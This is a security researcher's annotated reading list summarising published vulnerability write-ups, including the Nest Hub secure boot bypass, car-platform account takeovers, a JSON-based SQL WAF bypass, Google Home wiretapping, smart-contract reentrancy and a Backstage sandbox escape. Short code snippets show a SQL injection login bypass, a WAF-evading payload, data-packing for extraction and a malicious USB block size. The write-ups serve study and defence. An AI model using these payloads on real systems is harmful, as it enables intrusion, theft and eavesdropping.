Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Breaking Secure Boot on Google Nest Hub (2nd Gen) to run Ubuntu- 1043

fredericb    Reference → Posted 3 Years Ago
  • Google Nest Hub is an always-on smart home display built around the Amlogic S905D3G SoC. The device has a hidden USB port, making it a prime target for attackers.
  • Holding a combination of buttons (Volume Up + Volume Down) at boot (the author tried combinations at random until something worked) puts the device into a download mode. They tried using a known vulnerability on the same chipset, but this device had already been patched.
  • The author tears open the device to examine things more closely. The board has both USB and power connectors on a separate module, which is connected via a Flexible Flat Cable (FFC). Since there are 5 pins for USB and 2 for power, that leaves 8 pins for other functionality.
  • By probing with a multimeter and a logic analyzer while the device is running, they figure things out. The interesting part is one pin sitting near 0V and another fluctuating between 0V and 3.3V. This matches a UART port.
  • They solder the right connector to a breakout board and poke at the UART interface. While studying the boot log, the text "upgrade key not pressed" appears. Could be a new attack surface! When they try the button combo from the log, the text "Unable to read file recovery.img" appears. From doing research, they figure out this comes from the U-Boot bootloader code for recovery firmware upload.
  • The author decides to map out the attack surface for the parsing of this file, even though it's signed. They take a look at the FAT32 file system parser, since it had no publicly documented research. U-Boot provides a sandbox architecture, which allows it to run as a Linux user-space program. Let's fuzz it!
  • To start, they build a fuzzing harness into the block device reader and initialize the state to an expected point, such as USB enumeration complete and some partitions parsed. Once there, they set up AFL and libFuzzer to fuzz all of the different inputs that can be used. They find a crash caused by a buffer overflow when dev_desc->blksz is larger than 512.
  • Sounds great, right? In practice, USB flash drives never have a block size above this, so the author decides to build one! TinyUSB provides an example of turning a Raspberry Pi Pico into a Mass Storage device. Using this code, they can induce a crash on the real device!
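Since no real flash drive reports a block size above 512, the malicious device has to lie during SCSI enumeration. A minimal sketch of the relevant response, assuming the standard READ CAPACITY(10) layout from the SCSI spec (the specific values here are hypothetical, not the author's exact firmware):

```python
import struct

def read_capacity10(last_lba: int, block_size: int) -> bytes:
    """SCSI READ CAPACITY(10) data: 4-byte last LBA then a
    4-byte block length, both big-endian."""
    return struct.pack(">II", last_lba, block_size)

normal = read_capacity10(0x1FFF, 512)   # what real flash drives report
evil = read_capacity10(0x1FFF, 4096)    # oversized block size, larger than
                                        # the 512-byte buffers U-Boot reads into
```

A TinyUSB-based Pico simply returns the oversized value from its capacity handler, and the host-side read then overflows.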
  • This overflow allows for an overwrite of the saved return address. Since there are no stack canaries or NX at this level, they can jump to a location on the stack to execute code. Without easy debug access, the author creates a pattern that tells them what the actual offset is: 0x238.
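Without a debugger, the standard way to recover such an offset is a cyclic pattern: overflow once with it, observe which bytes land in the return address, and look up their position. A generic sketch of the technique (not the author's exact tooling):

```python
import string

def pattern(length: int) -> bytes:
    """Metasploit-style cyclic pattern: each aligned 3-byte chunk
    (upper, lower, digit) is unique, so any chunk observed in a
    crash pinpoints its position in the buffer."""
    out = bytearray()
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                out += (a + b + c).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])

def offset_of(crash_bytes: bytes, length: int = 2048) -> int:
    """Find where the value seen in the crash sits in the pattern."""
    return pattern(length).find(crash_bytes)
```

Sending `pattern(2048)` in place of the oversized block data, then searching for the bytes that ended up in the return address, yields the offset directly.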
  • The author writes a payload that dumps the device's RAM over UART. This requires dumping the gd structure first, since it contains a pointer to the bootloader in RAM. Once there, they can dump all of the memory. With access to the bootloader, they can call bootloader-defined functions to perform arbitrary actions, bypassing secure boot entirely.
  • The vulnerability and exploitation are pretty rad for jailbreaking the device. The author notes that the vulnerability they discovered through fuzzing had already been fixed upstream twice. Amazing writeup and implementation of a mass storage device to pwn this.

Web Hackers vs. The Auto Industry- 1042

Sam Curry    Reference → Posted 3 Years Ago
  • Sam Curry and collaborators decided to hit the auto industry, with targets ranging from BMW to Ferrari.
  • First, they looked at a platform with a custom SSO. They started with OSINT tools like gau and ffuf and found a WADL file with the exposed API endpoints. While making requests, they noticed that wildcards could be used to discover query parameter names. Another route, totp, returned a 7-digit password reset code given a user ID! This allowed for a complete compromise of all the dealer portals.
  • While reviewing the Mercedes-Benz infrastructure, they noticed the usage of LDAP for all employee-related things. Even though the main site didn't have a register function, they found the URL umas.mercedes-benz.com for repair shop tool access, which DID allow registration. These LDAP credentials could then be used on GitHub and various other portals they discovered. This led to code execution in many places and major information disclosure.
  • The author was mapping out Kia when they came across kdealer.com, where dealers can register accounts to activate Kia Connect for customers. kiaconnect.kdealer.com could be used to enroll a VIN but required a valid session to work. While reversing the client-side JavaScript, they noticed the header prelogin could give them a somewhat valid session to perform some actions.
  • Sadly, this continued to give errors. So, the authors took a valid session token from owners.kia.com and appended it to the request on the original site. This allowed them to create a valid vehicle initialization session to start taking over a car. Once again, adding the prelogin header allowed them to generate a dealer token to pair the vehicle to their own account. With this, the car could be remotely controlled.
  • The Ferrari CMS appeared to have backend credentials within the JavaScript frontend. They found an API endpoint that exposed all of the backend routes, as well as credentials for those endpoints. With this information, it was possible to perform many sensitive operations, such as modifying users, editing user roles and much more.
  • Spireon is a company similar to OnStar. While doing recon, they noticed the ancient site admin.spireon.com. Since it was behind auth and everything led to a redirect, they tried a simple SQL injection: admin'#. Luckily, this site predated modern security practices, leading to a login bypass. This could be used to perform admin actions like tracking cars. Neat!
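Why admin'# works as a login bypass, sketched against a hypothetical query (the real backend's SQL isn't shown in the post, and the table and column names below are invented):

```python
def build_login_query(username: str, password: str) -> str:
    """The vulnerable pattern: user input concatenated straight into SQL."""
    return ("SELECT * FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")

# The single quote closes the username string, and '#' starts a
# MySQL-style comment that swallows the password check entirely:
q = build_login_query("admin'#", "anything")
# SELECT * FROM users WHERE username = 'admin'#' AND password = 'anything'
```

The database only ever evaluates `username = 'admin'`, so any password logs in as admin.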
  • But they weren't done with this endpoint yet. Anything containing 'admin' would return a 403: a denylist. So, they fuzzed the endpoint and learned that %0dadmin would slip past the denylist but still return the normal page. With this admin portal, a malicious actor could backdoor all of the devices and leak a ton of information.
  • Reviver is a site that implements virtual license plates. Each company had a JSON object associated with it, and one of its fields was type, for the user type. While reviewing the JavaScript, they learned about several other user types, such as CORPORATE. By adding the role parameter, which is NOT normally shown in the request, the role of their account was changed.
  • Even with this, many authorization errors were given. So, the author had to create a new user account with their elevated permissions. Now, the permissions worked as expected. The vulnerability above is called a mass assignment bug, since the unexpected parameter was still applied to the underlying object. This admin account gave them full access to customer information and allowed for modifications as well.
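Mass assignment in a nutshell, as a toy sketch (the handler and field names besides the user type are hypothetical, not Reviver's actual API):

```python
def update_profile(user: dict, client_fields: dict) -> dict:
    """Toy vulnerable handler: copies every client-supplied field onto
    the stored object. BUG: no allow-list of editable fields."""
    user.update(client_fields)
    return user

user = {"email": "me@example.com", "role": "USER"}
# A normal edit only sends the fields visible in the UI; an attacker
# simply adds the hidden `role` field to the same request:
update_profile(user, {"email": "me@example.com", "role": "CORPORATE"})
```

The fix is to copy only an explicit allow-list of fields, never the whole client payload.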
  • Two things of note for me. First, lots of internal functionality is exposed publicly; since these various complicated sites have to operate together on the same core functionality, this is bound to happen. Second, many of these issues, such as the SSO bugs, only exist because of the attack surface as a whole, not an issue with any single website.

Emulating an iPod Touch 1G and iPhoneOS 1.0 using QEMU (Part I)- 1041

Martijn de Vos    Reference → Posted 3 Years Ago
  • The iPod Touch 1G was the first version in an amazing line of devices from Apple. The author wanted to emulate the device for future generations to enjoy. This was done via a fork of QEMU; in particular, they emulated all of the hardware required for booting and basic functionality.
  • The first iPod Touch uses the little-endian ARMv6 instruction set. The author attempted to run the BootRom code, but it jumped to code at an address they did not have; the same thing happened with the low-level bootloader (LLB). So, they moved on to emulating from iBoot instead.
  • To understand how iBoot works, they read through the source code of an open source implementation of it and referred back to the raw binary. From doing this, they were able to figure out how everything boots up, which hardware components are needed and everything else. Eventually, they were able to redirect print statements to the QEMU console.
  • First, iBoot initializes hardware components, reads images from NOR memory, does a few other things and finally reads the kernel image from NAND flash. The NOR image holds files, like the Apple logo, and several device properties. The NAND image contains the XNU kernel. Loading the image is not simple because the NAND drivers involve other algorithms, such as ECC, bad block management and more. The author had to write drivers for reading both the NOR and NAND flash properly.
  • To get the XNU kernel going, the author had to decrypt the image, which uses the 8900 encryption scheme. iBoot jumps to decryption code that the author did not have at the time, so they implemented the decryption in QEMU logic instead. There were other hardware components to emulate as well, like the Power Management Unit (PMU).
  • The XNU kernel is open source, but Apple ships its own fork of it. To understand how the system boots up, they could follow the open source code for the most part: from MMIO to loading the device tree to 30 different drivers that needed to load correctly. The hardest one was the Flash Memory Controller (FMC), which had no documentation or source code available.
  • Finally, after this, launchd starts up. This is PID 1, the first process, which starts everything else on the device. While launching SpringBoard (the main UI on the iPod), the device crashed because it tried to use the graphics processor. While reverse engineering the application, the author learned that the environment variable LK_ENABLE_MBX2D disables the graphics processor. Finally, the home screen appears!
  • The final step was getting the touch screen working. The emulator simulates touch by converting a click into an (x, y) coordinate pair. The kernel communicates with the multitouch device over SPI. By reverse engineering this protocol and looking at the bus traffic, the author figured out how to inject QEMU window touches as frames for the multitouch device. This included velocity, (x, y) coordinates, the home button and more.
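The multitouch wire format itself had to be reverse engineered from bus traffic; purely as an illustration of the idea (the field layout below is invented, not the real protocol), a click becomes fixed-width frames fed to the emulated SPI device:

```python
import struct

def touch_frame(x: int, y: int, touching: bool) -> bytes:
    """Hypothetical multitouch frame: two little-endian 16-bit
    coordinates plus a 1-byte touch-down flag."""
    return struct.pack("<HHB", x, y, 1 if touching else 0)

def on_qemu_click(x: int, y: int) -> list:
    """A mouse click maps to a press frame followed by a release frame."""
    return [touch_frame(x, y, True), touch_frame(x, y, False)]
```

The real frames also carry velocity and home-button state, per the article.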
  • After a few more small changes, such as adding some files that were missing from the stock NAND flash, they were able to get the iPod working in the emulator! There is still much work to be done, including emulating the second generation, but this is amazing work. Love the article and the process that went into getting this working with QEMU.

{JS-ON: Security-OFF}: Abusing JSON-Based SQL to Bypass WAF- 1040

Noam Moshe - claroty    Reference → Posted 3 Years Ago
  • While looking at Cambium, the authors found a simple SQL injection vulnerability. As always, the developers were not using parameterized queries, and string concatenation led to SQL injection. However, the exploitation is what was interesting.
  • There are a few limitations on the query. First, only integers can be retrieved from the rows. Using a UNION, we can query from other tables, but only integers. To get around this, the author converted each character into an integer.
  • The second limitation was that the rows were returned in random order, since this was an asynchronous call. To recover the ordering, the author prepended the row index to each value by multiplying the index by 1,000 and adding the character value.
  • The final limitation was that the asynchronous call could time out before returning the data. To make this more efficient, the author packed more information into each request. In particular, they converted the characters into a BIGINT, which can store 8 bytes of data. This resulted in the ability to store 7 times as much data as before.
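One way the packing could look, as a minimal sketch (assuming one index byte plus up to seven ASCII characters per 8-byte BIGINT; the exact layout the author used isn't spelled out here):

```python
def encode_chunk(row_index: int, chars: str) -> int:
    """Pack a row-index byte and up to 7 ASCII chars into one BIGINT."""
    assert 0 <= row_index < 256 and len(chars) <= 7
    padded = chars.ljust(7, "\x00")  # pad so the index lands in the top byte
    value = row_index
    for c in padded:
        value = (value << 8) | ord(c)
    return value

def decode_chunk(value: int):
    """Recover (row_index, chars) from one exfiltrated BIGINT."""
    data = value.to_bytes(8, "big")
    return data[0], data[1:].decode("ascii").rstrip("\x00")
```

Sorting the decoded chunks by their index byte then reassembles the data regardless of the order the rows came back in.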
  • They tested this on a local instance. When testing against the cloud, they ran into AWS Web Application Firewall (WAF) blocks. According to the authors, WAFs either keep a denylist of words for recognizing SQL syntax or try to parse SQL syntax out of the request.
  • This WAF was trying to recognize SQL syntax in the request, so they tested hundreds of requests with many obscure features. Recent generations of SQL support JSON inside queries, and while testing JSON, the author noticed that using JSON syntax made the WAF unable to recognize the query as SQL. Neat!
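As a hypothetical illustration of the idea (these are not the post's exact payloads): a tautology every SQL-aware WAF knows can be rewritten with a JSON operator, here PostgreSQL's `@>` containment operator, that older SQL tokenizers inside WAFs may fail to parse:

```python
# A tautology that signature-based WAF SQL parsers recognize:
classic = "' OR 1=1 -- -"

# The same always-true condition expressed via JSON containment
# (every JSON document trivially contains itself):
json_based = "' OR '{\"a\":1}'::jsonb @> '{\"a\":1}'::jsonb -- -"
```

To the backend database both conditions are true; to a WAF that cannot tokenize the JSON operators, the second no longer looks like SQL at all.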
  • Does this work elsewhere? It turns out that other major firewall vendors were vulnerable to the same JSON trick as well! Considering WAFs need to be incredibly fast at parsing, it makes sense that they would not support every SQL feature.
  • Overall, good post for the vulnerability exploitation and WAF bypass.

Expose JTAG pads on the package- 1039

@HackingThings - Mickey    Reference → Posted 3 Years Ago
  • The three-minute video shows the author trying to access JTAG ports within the chip. They scrape at the SoC with a pair of tweezers, then use some acid to get to the rest. After this, they solder onto the wires to get access to the JTAG interface. Pretty neat!

Turning Google smart speakers into wiretaps for $100k- 1038

downrightnifty    Reference → Posted 3 Years Ago
  • Google Home is a suite of products for around-the-house automation. While using the device, the author noticed how seamless adding users was. Additionally, the set of automated routines that can be run remotely made the linking process look like a fruitful target.
  • First, they decided to use a proxy to look at the web traffic of the device. This took some shenanigans to intercept on the phone, such as adding mitmproxy as a root CA and bypassing certificate pinning with a Frida script. They then observed the linking process in the web traffic, seeing a request made to /deviceuserlinksbatch. The request used protobuf, a binary serialization format made by Google.
  • The linking process was made up of two requests:
    1. Get the devices' info through the local API.
    2. Send a link request to the Google server alongside this information.
  • The author reimplemented everything in Python for their own sanity, since manually recreating the protobuf binary from scratch would have been very annoying. They found a script for calling Google Cloud APIs and another that did the whole Android Google login process. With the authentication and protobuf setup, they could craft their own requests. It should be noted that working with protobufs normally assumes both parties have a .proto file that defines the types and names; the requests themselves don't carry types (so they must be guessed) and don't have names associated with the fields.
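Guessing field numbers and wire types without a .proto works because every protobuf field is prefixed by a varint tag. A minimal sketch of decoding those tags (this illustrates the wire format, not the author's actual tooling):

```python
def read_varint(data: bytes, pos: int):
    """Decode a base-128 varint; return (value, next position)."""
    value, shift = 0, 0
    while True:
        byte = data[pos]
        value |= (byte & 0x7F) << shift
        pos += 1
        if not byte & 0x80:
            return value, pos
        shift += 7

def field_tags(data: bytes):
    """Yield (field_number, wire_type) for each top-level field.

    Only varint (0) and length-delimited (2) payloads are handled here."""
    pos = 0
    while pos < len(data):
        tag, pos = read_varint(data, pos)
        yield tag >> 3, tag & 7
        if (tag & 7) == 0:        # varint payload
            _, pos = read_varint(data, pos)
        elif (tag & 7) == 2:      # length-delimited (string/bytes/message)
            length, pos = read_varint(data, pos)
            pos += length
        else:
            break                 # other wire types omitted in this sketch
```

Walking a captured request with this reveals its field numbers and wire types, after which the meaning of each field still has to be guessed from context.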
  • The author made a request with this and it magically worked! There was no authorization check on whether an account had access to a particular Google Home device, so an attacker could link their own account to a victim's Google Home with ease. What can an attacker actually do with this, though? This is where the article goes off the rails!
  • First, they considered the different avenues for controlling devices in the house, such as opening garage doors, which had been detailed in earlier research. While scrolling through the actions on the device, they noticed a call command. If the device could be tricked into calling an attacker's number from a routine, the microphone audio would be transmitted over the call. Spy capabilities unlocked!
  • While trying to escalate the damage, they found a 2014 article from Dan Petro. It mentions that when a Chromecast loses its connection, it goes into a setup mode. By forcing the device to deauth with specially crafted WiFi frames from close proximity, an attacker can make a local API request to get the device's Cloud ID and certificate.
  • While reading docs, the author noticed the Local Home SDK for creating smart home actions on the device. Even though it documents direct LAN access, the device tries to restrict this by only allowing connections to devices that pass a scan. However, when the app is in development mode, the Chrome DevTools Protocol (CDP), a remote version of Chrome DevTools, is open on the device. Using this, an attacker can access the standard JS APIs to make arbitrary requests on the LAN and read and write files, likely leading to RCE.
  • With this finding and set of exploit chains, the author contacted Google. The author was rewarded with a 100K bounty, after initially getting hit with this being intended functionality. Google did a few things to patch these issues:
    • You must request an invite to the 'Home' that the device is registered to in order to link your account to it through the /deviceuserlinksbatch API.
    • Call commands cannot be invoked remotely anymore.
    • Although the deauth attack still works, it can no longer be used to link an account, since an auth token for the device can no longer be obtained this way.
  • Overall, excellent technical findings! It was really cool to see the bug and the exploits that were possible from it. I wish the article was more focused, though; it seemed like there were a lot of unnecessary details, making it hard to figure out what to focus on.

Hack Analysis: Omni Protocol, July 2022- 1037

Immunefi    Reference → Posted 3 Years Ago
  • Omni is an NFT money market on Ethereum. It allowed borrowing and lending against NFTs: for instance, a user could borrow an ERC-20 asset with an NFT put up as collateral. This makes the NFT more liquid, since it can be borrowed against.
  • The function executeWithdrawERC721 runs when a user wants to remove their NFT collateral from the market. When it does this, it calls onERC721Received on the recipient if the recipient is a contract implementing the interface.
  • When allowing code to be executed as a callback, two things need to be done: use the checks-effects-interactions pattern and include reentrancy locks. If these are not done, major havoc can ensue.
  • The function executeWithdrawERC721 has a snippet of code that informs the market that the address no longer has collateral deposited in the contract. Because the callback fires before this variable is changed, the attacker can reenter the contract and borrow! When the code finishes, the collateral is withdrawn, allowing them to steal funds from the contract.
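As a toy illustration of the unsafe ordering (a Python model, not Omni's actual Solidity): the callback runs while the ledger still counts the collateral, so a reentrant borrow passes its checks.

```python
class ToyMarket:
    """Minimal model of a market that fires a callback before updating state."""
    def __init__(self):
        self.collateral = {}   # user -> deposited collateral value
        self.debt = {}         # user -> borrowed value

    def deposit(self, user, amount):
        self.collateral[user] = self.collateral.get(user, 0) + amount

    def borrow(self, user, amount):
        free = self.collateral.get(user, 0) - self.debt.get(user, 0)
        assert amount <= free, "insufficient collateral"
        self.debt[user] = self.debt.get(user, 0) + amount

    def withdraw(self, user, on_received):
        # BUG: interaction (callback) happens before the effect (state update)
        on_received()              # attacker reenters here
        self.collateral[user] = 0  # collateral zeroed only afterwards

market = ToyMarket()
market.deposit("attacker", 100)
# Reenter during withdraw: the ledger still shows 100 of collateral,
# so borrowing against it succeeds even though it is about to leave.
market.withdraw("attacker", lambda: market.borrow("attacker", 100))
```

Afterwards the attacker holds 100 of debt backed by zero collateral, which is exactly the state the checks-effects-interactions ordering (update first, call out second) would have prevented.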
  • A similar vulnerability occurs in the executeERC721LiquidationCall hook around the burn function. The attacker actually abused both of the vulnerabilities to perform the reentrancy twice.
  • The rest of the post contains a great proof of concept with step by step details on how to exploit the bug. Overall, interesting vulnerability and interesting exploit!

Audius Governance Takeover Post-Mortem- 1036

audius    Reference → Posted 3 Years Ago
  • Audius is a blockchain music platform. In July of 2022, its governance was hacked.
  • The Audius governance contract uses the OpenZeppelin proxy upgrade pattern, overriding the standard implementation with AudiusAdminUpgradeabilityProxy. This contract is used to change the implementation contract in use.
  • The contract AudiusAdminUpgradeabilityProxy uses storage slot 0 for the proxyAdmin address. Additionally, the implementation contract used the OpenZeppelin Initializable contract, which places the variables initialized and initializing in the first slot of the implementation contract's layout.
  • The proxyAdmin address was 0x4deca517d6817b6510798b7328f2314d3003abac. Because the proxy and implementation share storage, this value led to both initializing and initialized being truthy! What does this mean? The initializer modifier would always succeed, allowing the implementation contract to be reinitialized over and over again.
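The collision can be checked by hand. Assuming the older OpenZeppelin Initializable layout, where `bool initialized` and `bool initializing` are packed into the lowest bytes of slot 0 (the same slot the proxy uses for proxyAdmin):

```python
# The proxyAdmin address stored in slot 0 of the proxy:
slot0 = 0x4DECA517D6817B6510798B7328F2314D3003ABAC

# Read the same slot through the implementation's layout, where the
# two booleans occupy the two lowest bytes:
initialized = bool(slot0 & 0xFF)           # lowest byte 0xac -> truthy
initializing = bool((slot0 >> 8) & 0xFF)   # next byte 0xab -> truthy
```

Any address whose low bytes are nonzero, which is almost all of them, makes both flags read as true through the shared slot.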
  • This bug allowed the attacker to call the initialization functions of the deployed Audius contracts and change storage state that was only intended to be set once. Using this, they were able to redefine the voting protocol and transfer themselves a ton of money.
  • To fix this vulnerability, the team used the bug itself to patch in a simple contract. Then, they deployed a new version of the implementation whose initialization variables did not overlap with the proxyAdmin address.
  • The vulnerability existed in the project for 2 years without anybody noticing. Considering the team used two well-defined and audited contracts, it is crazy that this vulnerability ever existed. Good report on the finding though!

Stack Overflow in Ping - FreeBSD- 1035

Tom Jones - FreeBSD    Reference → Posted 3 Years Ago
  • ping is a program to test network reachability of remote hosts. It uses raw sockets in order to send and receive ICMP messages.
  • ping reads raw IP packets from the network responses. As part of this processing, ping must reconstruct the IP header, the ICMP header and the quoted packet (for ICMP errors). While parsing these, a bunch of data is copied around.
  • pr_pack() copies the received IP and ICMP headers into stack buffers. However, the sizes of these buffers don't account for IP option headers following the response. When IP options are present, this creates a 40-byte stack buffer overflow.
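The 40-byte figure falls out of the IPv4 header format: the 4-bit IHL field allows headers up to 60 bytes, while a buffer sized for the option-less 20-byte header leaves the rest unaccounted for. A quick sketch of the arithmetic:

```python
# IPv4's 4-bit IHL field counts 32-bit words, so the header can be
# up to 15 * 4 = 60 bytes, of which 20 are the fixed base header.
BASE_HEADER = 20                        # option-less IPv4 header size
MAX_HEADER = 0b1111 * 4                 # largest header IHL can describe: 60
max_options = MAX_HEADER - BASE_HEADER  # up to 40 bytes of IP options

# A stack buffer sized only for the base header can therefore be
# overrun by up to max_options bytes when options are present.
```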
  • With modern binary protections like ASLR and stack canaries in place, it is unlikely that this could be exploited remotely. ping also runs in a capability-mode sandbox, which drastically limits what it can do. Defense in depth for the win!

RCE in Spotify’s Backstage via vm2 Sandbox Escape- 1034

oxeye    Reference → Posted 3 Years Ago
  • Backstage is an open source platform built by Spotify for building developer portals. It allows monitoring and managing of software across microservices and infrastructure, making it super useful. Thus, compromising it would cause major problems for a company, depending on the custom functionality added to it.
  • Backstage is composed of 3 main parts: the core, which provides the base functionality of the application; the app, an instance that ties the core together with the plugins; and the plugins, which add functionality to make it more useful.
  • Configuration is done via YAML file templates parsed by Nunjucks, a templating engine similar to Jinja2. Templating engines are known to have security issues, and there were problems back in 2016 with bypassing the Nunjucks protections. The goal of this attack was to abuse the templating engine to get code execution on the box.
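As a generic illustration of why template injection is dangerous (a toy evaluator, not Nunjucks itself): any engine that evaluates expressions embedded in user-controlled text effectively hands the user an interpreter, which is why real engines wrap evaluation in a sandbox like vm2.

```python
import re

def naive_render(template: str) -> str:
    """Toy template engine: evaluates every {{ ... }} with eval().

    DANGER: eval() runs arbitrary code. Real engines sandbox this step;
    the attack in the post is about escaping such a sandbox (vm2),
    not exploiting a missing one."""
    return re.sub(r"\{\{(.*?)\}\}",
                  lambda m: str(eval(m.group(1))),
                  template)

# Harmless-looking math already proves code is being executed:
result = naive_render("id: {{ 7 * 7 }}")  # -> "id: 49"
```

Seeing `49` instead of the literal `{{ 7 * 7 }}` is the classic probe for server-side template injection.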
  • Using the templates, it is pretty easy to reach code execution. However, this puts you into a vm2 sandbox, requiring a sandbox escape. Escapes had been found in the past by controlling properties defined outside of the sandbox.
  • When attempting to call the getThis() method on custom stack traces, the result was undefined within the YAML file. From reading the docs, this was because strict mode was enabled, preventing anything outside of the context from being reached. They modified the code to see where the check was causing this to fail: it was in the function renderString2.
  • Is there protection against overwriting this function? By redefining the function renderString in a template file, they could hook it so that strict mode is NOT used. The payload looks somewhat like prototype pollution. With strict mode off, they could freely use getThis() on the stack trace handler to get code execution on the machine. Besides this, some cleanup was done to keep the application usable.
  • Adding custom templates shouldn't be possible, right? Since Backstage is not supposed to be exposed publicly, there is no authentication on it by default. However, a powerful SSRF, network penetration, or a poorly configured server leaves it potentially vulnerable to attack. Even though an auth page can be enabled, it only protects the frontend and not the backend.
  • Overall, an interesting blog post on the dangers of templating engines and the sandbox escapes. Great write up!